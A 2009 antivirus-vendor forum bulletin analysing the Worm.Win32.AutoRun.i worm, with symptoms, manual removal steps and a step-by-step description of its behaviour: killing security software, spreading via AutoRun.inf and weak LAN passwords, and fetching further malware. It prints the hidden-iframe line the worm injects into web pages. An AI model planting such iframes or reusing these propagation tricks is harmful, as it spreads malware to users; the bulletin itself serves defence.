微点交流论坛 - 病毒快报 - "中华吸血鬼"新变种Worm.Win32.AutoRun.i

» 游客: 注册 | 登录 | 帮助

微点交流论坛 » 病毒快报 » "中华吸血鬼"新变种Worm.Win32.AutoRun.i

pioneer
超级版主

积分 4563
发帖 4545
注册 2007-7-16
来自 BJ

#1 "中华吸血鬼"新变种Worm.Win32.AutoRun.i

"中华吸血鬼"新变种

Worm.Win32.AutoRun.i

捕获时间

2009-10-15

危害等级

高

病毒症状

　该样本是使用“VC”编写的蠕虫病毒，由微点主动防御软件自动捕获，采用“FSG”加壳方式，企图躲避特征码扫描，加壳后长度为“16,897 字节 ”，图标为“

”，病毒扩展名为“exe”，主要通过“文件捆绑”、“下载器下载”、“移动存储介质”、“网页挂马”等方式传播，病毒主要目的为下载大量病毒并运行。
　　用户中毒后，会出现大多数杀毒软件退出和无法正常运行、系统运行缓慢、网络速度变缓、无法进入安全模式、金山毒霸无法在线升级、打开网页始终访问同一个网址、许多反病毒论坛网页无法打开、出现大量未知进程等现象。

感染对象

Windows 2000/Windows XP/Windows 2003/Vista

传播途径

网页木马、文件捆绑、下载器下载

防范措施

已安装使用微点主动防御软件的用户，无须任何设置，微点主动防御将自动保护您的系统免受该病毒的入侵和破坏。无论您是否已经升级到最新版本，微点主动防御都能够有效清除该病毒。如果您没有将微点主动防御软件升级到最新版，微点主动防御软件在发现该病毒后将报警提示您发现“未知木马”，请直接选择删除处理（如图1）；

图1 微点主动防御软件自动捕获未知病毒（未升级）

如果您已经将微点主动防御软件升级到最新版本，微点将报警提示您发现"Worm.Win32.AutoRun.i”，请直接选择删除（如图2）。

图2 微点主动防御软件升级后截获已知病毒

未安装微点主动防御软件的手动解决办法：

1、手动恢复以下文件：

全盘删除所有压缩包中名为”安装.bat”的病毒文件。
全盘删除所有网页文件中的以下代码:
<iframe src=http://www.xx.cn/1.htm width=0 height=0></iframe>
全盘删除所有文件夹下名为wsock32.dll的文件
拷贝相同版本文件到: %SystemRoot%\system32\drivers\etc\hosts

2、手动删除以下文件：
　　
%SystemRoot%\ini
%SystemRoot%\ini\ini.exe
%SystemRoot%\ini\shit.vbs
%SystemRoot%\Tasks\安装.bat
%TEMP%\configmon.dat
%SystemRoot%\ini\wsock32.dll
%SystemRoot%\ini\desktop.ini
%SystemDriver%\__default.pif
X:\AutoRun.inf
X:\recycle.{645FF040-5081-101B-9F08-00AA002F954E}
X:\recycle.{645FF040-5081-101B-9F08-00AA002F954E}\ini.exe  (X为系统各个盘符)

3、手动删除以下注册表键值：

键: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components
值: {H8I22RB03-AB-B70-7-11d2-9CBD-0O00FS7AH6-9E2121BHJLK}

4、手动修复以下注册表键值:

修复安全模式:
键: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network
键:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal

修复脚本显示:
键:HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings
值: ActiveDebugging 数据:1
值: DisplayLogo       数据:1
值: SilentTerminate 数据:0
值:UseWINSAFER       数据:1

变量声明：

　%SystemDriver%　　　　　　　系统所在分区，通常为“C:\”
　%SystemRoot%　　　　　　　　WINDODWS所在目录，通常为“C:\Windows”
　%Documents and Settings%　　用户文档目录，通常为“C:\Documents and Settings”
　%Temp%　　　　　　　　　　　临时文件夹，通常为“C:\Documents and Settings\当前用户名称\Local Settings\Temp”
　%ProgramFiles%　　　　　　　系统程序默认安装目录，通常为：“C:\ProgramFiles”

※文章所有权归【pioneer】与【东方微点论坛】共同所有，转载请注明出处！※

2009-10-15 11:43

pioneer
超级版主

积分 4563
发帖 4545
注册 2007-7-16
来自 BJ

#2

病毒分析

（1）创建目录%SystemRoot%\ini,并设置目录属性为隐藏, 释放文件%SystemRoot%\ini\ini.exe,并执行。
（2）创建互斥体，防止重复运行。
（3）获得当前进程列表，检测大多数反病毒软件进程，一旦找到，终止目标进程，并监视窗口文本，发现相匹配的关键字便发送一个
窗口退出消息将目标窗口退出。
（4）在每个盘符下生成文件AutoRun.inf,并创建目录 recycle.{645FF040-5081-101B-9F08-00AA002F954E},将
%SystemRoot%\ini\ini.exe复制到recycle.{645FF040-5081-101B-9F08-00AA002F954E}\ini.exe,并设置为隐藏，使用户每次双击
磁盘和打开资源管理器时自动运行病毒
（5）删除注册表相关键值，使病毒可以悄无声息的执行脚本程序。并创建病毒自己的注册表项，使其成为Windows的活动组件，当用户
安装组件时，会自动执行病毒的脚本程序。接着释放脚本文件%SystemRoot%\ini\shit.vbs,运行该脚本后，将执行病毒程序%SystemRoot%\ini\ini.exe。
（6）全盘查找后缀名为"html、htm、asp、aspx、php、jsp"格式的网页文件，如果找到，往目标文件中插入类似<iframe  src=http://www.xx.cn/1.htm width=0 height=0></iframe>的恶意代码，并搜索后缀名为"gho、GHO、Gho"的文件，一旦找到，将其删除。使用户丢失系统备份数据。
（7）扫描局域网内其它主机IP地址，并尝试通过匹配弱口令的方式穷举出用户管理员密码。如果穷举成功，则将
%SystemRoot%\ini\ini.exe重命名为kav32.exe复制到目标主机的每个共享目录下，并设置成在某一时间执行该病毒。
（8）病毒通过加载系统核心文件NTDLL.DLL，获得相关API函数虚拟地址，操作PhysicalMemory内核对象，并提升权限，从而实现对物理内存的直接读写操作。
（9）病毒将%SystemRoot%\ini\ini.exe重命名后复制到%SystemRoot%\Tasks\安装.bat,并全盘查找后缀名为"rar、zip、tgz、tar"的压缩包文件，一旦找到，利用%ProgramFiles%\WinRAR\Rar.exe程序将目标压缩包解压，将病毒程序"安装.bat"复制到解压出来的文件夹中，然后再压缩回去，完成将病毒添加到压缩包的功能
（10）访问目标网址，下载资源文件到%TEMP%\configmon.dat文件中，并访问资源网址，下载大量病毒到本地运行。并统计被感染主机相关信息，发送到指定网址。
（11）释放动态链接库%SystemRoot%\ini\wsock32.dll,并遍历所有磁盘文件夹，将文件%SystemRoot%\ini\wsock32.dll复制到每一个找到的文件夹下，并设置该文件属性为隐藏。
（12）释放文件%SystemDriver%\__default.pif，访问网络下载病毒更新程序，并执行，达到更新病毒自身的目的，
并删除文件%Documents and Settings%\All Users\Application Data\Kingsoft\KIS\Log.DAT和%Documents and Settings%\All Users\Application Data\Kingsoft\KIS\User.DAT使金山毒霸无法在线升级，并修改%SystemRoot%\System32\drivers\etc\hosts文件。
（13）删除注册表自启动项下的所有键值，并通过删除注册表对应键值破坏安全模式。
(14) 创建文件%SystemRoot%\ini\desktop.ini,写入desktop.ini，将其伪装成回收站，并设置为隐藏，用来隐藏自身。
（15）删除自身，退出进程。
　　
病毒创建文件：

%SystemRoot%\ini
%SystemRoot%\ini\ini.exe
%SystemRoot%\ini\shit.vbs
%SystemRoot%\Tasks\安装.bat
%TEMP%\configmon.dat
%SystemRoot%\ini\wsock32.dll
%SystemRoot%\ini\desktop.ini
%SystemDriver%\__default.pif
X:\AutoRun.inf
X:\recycle.{645FF040-5081-101B-9F08-00AA002F954E}
X:\recycle.{645FF040-5081-101B-9F08-00AA002F954E}\ini.exe  (X为系统各个盘符)

病毒修改文件：

%SystemRoot%\system32\drivers\etc\hosts

病毒删除文件：

%Documents and Settings%\All Users\Application Data\Kingsoft\KIS\Log.DAT
%Documents and Settings%\All Users\Application Data\Kingsoft\KIS\User.DAT
X:\*.GHO (X为系统各盘符，*.GHO表示所有的GHO文件)

病毒创建注册表：

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{H8I22RB03-AB-B70-7-11d2-    9CBD-0O00FS7AH6-9E2121BHJLK}

病毒删除注册表：

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\[所有程序]
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal

病毒访问网络：

http://****/get.asp
http://****/me.exe
http://pc.sk**ne.cn/gr.txt

※文章所有权归【pioneer】与【东方微点论坛】共同所有，转载请注明出处！※

2009-10-15 11:51

论坛跳转:

可打印版本 | 推荐 | 订阅 | 收藏

[ 联系我们 - 东方微点 ] 北京东方微点信息技术有限责任公司福建东方微点信息安全有限责任公司闽ICP备05030815号